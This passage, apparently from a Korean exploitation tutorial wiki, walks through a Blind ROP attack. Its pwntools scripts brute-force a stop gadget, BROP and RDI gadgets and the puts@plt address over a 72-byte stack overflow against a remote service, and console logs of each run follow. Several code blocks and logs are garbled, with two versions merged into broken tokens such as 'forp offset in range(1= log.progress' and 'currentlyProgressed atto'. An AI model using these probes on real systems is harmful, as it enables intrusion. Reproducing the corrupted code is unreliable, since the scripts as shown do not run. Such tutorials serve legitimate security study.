...
| Code Block | ||||
|---|---|---|---|---|
| ||||
base = 0x400000 def find_stop_gadget(size): p = log.progress("Searching for Stop gadget ") for offset in range(1,0x1000): addr = int(base + offset) payload = '' payload += 'A' * size payload += p64(addr) if offset % 0x100 == 0: log.info(" Progressed to 0x%x" % offset) try: r = remote(ip,port,level='error') r.recvuntil('WelCome my friend,Do you know password?\n') r.send(payload) response = r.recv(timeout=0.2) r.close() if 'WelCome my friend,Do you know password?' in response: p.success("Done") log.info("Stop address: " + hex(addr)) return addr except Exception as e: r.close() |
- 다음과 같이 앞에서 작성한 스크립트를 이용해 Stop Gadget을 찾을 수 있습니다.
| Code Block | ||
|---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/BROP$ python ./find_stop_gadget.py [*] Overflow size : 72 [+] Searching for Stop gadget : Done [*] Progressed to 0x100 [*] Progressed to 0x200 [*] Progressed to 0x300 [*] Progressed to 0x400 [*] Progressed to 0x500 [*] Stop address: 0x4005c0 |
...
| Code Block | ||||
|---|---|---|---|---|
| ||||
def maybe_BROP_gadget(size, stop_gadget, addr):
try:
payload = ''
payload += 'A' * size
payload += p64(addr)
payload += p64(0) * 6
payload += p64(stop_gadget)
r = remote(ip,port,level='error')
r.recvuntil('WelCome my friend,Do you know password?\n')
r.sendline(payload)
response = r.recv(timeout=0.2)
r.close()
if 'WelCome my friend,Do you know password?' in response:
return True
return False
except Exception as e:
r.close()
return False |
- 다음과 같이 Stop Gadget을 제거하고 BROP Gadget으로 추측되는 주소만을 사용해서 전달합니다.
- 예외가 발생하면 BROP Gadget으로 판단합니다.
| Code Block | ||||
|---|---|---|---|---|
| ||||
def is_BROP_gadget(size,addr):
try:
payload = ''
payload += 'A' * size
payload += p64(addr)
payload += p64(0x41) * 10
r = remote(ip,port,level='error')
r.recvuntil('WelCome my friend,Do you know password?\n')
r.sendline(payload)
response = r.recv()
r.close()
return False
except Exception as e:
return True |
- 다음 코드를 이용하여 BROP Gadget을 찾을 수 있습니다.
| Code Block | ||||
|---|---|---|---|---|
| ||||
def find_brop_gadget(size,stop_gadget):
forp offset in range(1= log.progress("Searching for BROP gadget ")
for offset in range(0x1,0x1000):
if offset % 0x100 == 0:
print "[!] currently at 0x%x"log.info('Progressed to 0x%x' % offset)
addr = int(base + offset)
if maybe_BROP_gadget(size,stop_gadget,addr):
log.info('Maybe BROP Gagget : ' + hex(int(base + offset)))
if is_BROP_gadget(size, addr):
p.success("Done")
log.info('Finded BROP Gagget : ' + hex(int(base + offset)))
return addr |
...
| Code Block | ||
|---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/BROP$ python maybe_BROP_gadget.py [*] Overflow size : 72 [*+] STOP GadgetSearching for Stop gadget : 0x4005c0Done [!*] currentlyProgressed atto 0x100 [!*] currentlyProgressed atto 0x200 [!*] currentlyProgressed atto 0x300 [!] currently at*] Progressed to 0x400 [*] Progressed to 0x500 [*] Stop address: 0x4005c0 [+] Searching for BROP gadget : Done [*] Progressed to 0x100 [*] Progressed to 0x200 [*] Progressed to 0x300 [*] Progressed to 0x400 [!*] currentlyProgressed atto 0x500 [*] Maybe BROP Gagget : 0x4005c0 [*] Maybe BROP Gagget : 0x4005c2 [*] Maybe BROP Gagget : 0x4005c3 [*] Maybe BROP Gagget : 0x4005c5 [*] Maybe BROP Gagget : 0x4005c6 [*] Maybe BROP Gagget : 0x4005c7 [*] Maybe BROP Gagget : 0x4005c9 [*] Maybe BROP Gagget : 0x4005cd [*] Maybe BROP Gagget : 0x4005ce [*] Maybe BROP Gagget : 0x4005cf [*] Maybe BROP Gagget : 0x4005d0 [*] Maybe BROP Gagget : 0x4005d6 [*] Maybe BROP Gagget : 0x4005d7 [*] Maybe BROP Gagget : 0x4005dd [*] Maybe BROP Gagget : 0x4005de [!*] currentlyProgressed atto 0x600 [*] Maybe BROP Gagget : 0x4006b6 [*] Maybe BROP Gagget : 0x4006b7 [*] Maybe BROP Gagget : 0x4006b8 [*] Maybe BROP Gagget : 0x4006ba [*] Maybe BROP Gagget : 0x4006ce [*] Maybe BROP Gagget : 0x4006e2 [*] Maybe BROP Gagget : 0x4006f6 [!*] currentlyProgressed atto 0x700 [*] Maybe BROP Gagget : 0x4007ba [*] Finded BROP Gagget : 0x4007ba [*+] BROP Gadget : 0x4007ba [*+] RDI Gadget : 0x4007c3 |
Get puts@plt address
...
| Code Block | ||
|---|---|---|
| ||
lazenca0x0@ubuntu:~/Exploit/BROP$ python BROPfind_puts_addr.py [*] Overflow size : 72 [*] STOP Gadget : 0x4005c0 [*] BROP +] Searching for Stop gadget : Done [*] Progressed to 0x100 [*] Progressed to 0x200 [*] Progressed to 0x300 [*] Progressed to 0x400 [*] Progressed to 0x500 [*] Stop address: 0x4005c0 [+] Searching for BROP gadget : Done [*] Progressed to 0x100 [*] Progressed to 0x200 [*] Progressed to 0x300 [*] Progressed to 0x400 [*] Progressed to 0x500 [*] Maybe BROP Gagget : 0x4005c0 [*] Maybe BROP Gagget : 0x4005c2 [*] Maybe BROP Gagget : 0x4005c3 [*] Maybe BROP Gagget : 0x4005c5 [*] Maybe BROP Gagget : 0x4005c6 [*] Maybe BROP Gagget : 0x4005c7 [*] Maybe BROP Gagget : 0x4005c9 [*] Maybe BROP Gagget : 0x4005cd [*] Maybe BROP Gagget : 0x4005ce [*] Maybe BROP Gagget : 0x4005cf [*] Maybe BROP Gagget : 0x4005d0 [*] Maybe BROP Gagget : 0x4005d6 [*] Maybe BROP Gagget : 0x4005d7 [*] Maybe BROP Gagget : 0x4005dd [*] Maybe BROP Gagget : 0x4005de [*] Progressed to 0x600 [*] Maybe BROP Gagget : 0x4006b6 [*] Maybe BROP Gagget : 0x4006b7 [*] Maybe BROP Gagget : 0x4006b8 [*] Maybe BROP Gagget : 0x4006ba [*] Maybe BROP Gagget : 0x4006ce [*] Maybe BROP Gagget : 0x4006e2 [*] Maybe BROP Gagget : 0x4006f6 [*] Progressed to 0x700 [*] Maybe BROP Gagget : 0x4007ba [*] Finded BROP Gagget : 0x4007ba [+] BROP Gadget : 0x4007ba [*+] RDI Gadget : 0x4007c3 [!▖] Searching for the address of puts@plt [*] currently at 0x100 [!*] currently at 0x200 [!*] currently at 0x300 [!*] currently at 0x400 [!*] currently at 0x500 find puts@plt addr: 0x400555 [*+] Puts plt : 0x400555 |
Dump memory
...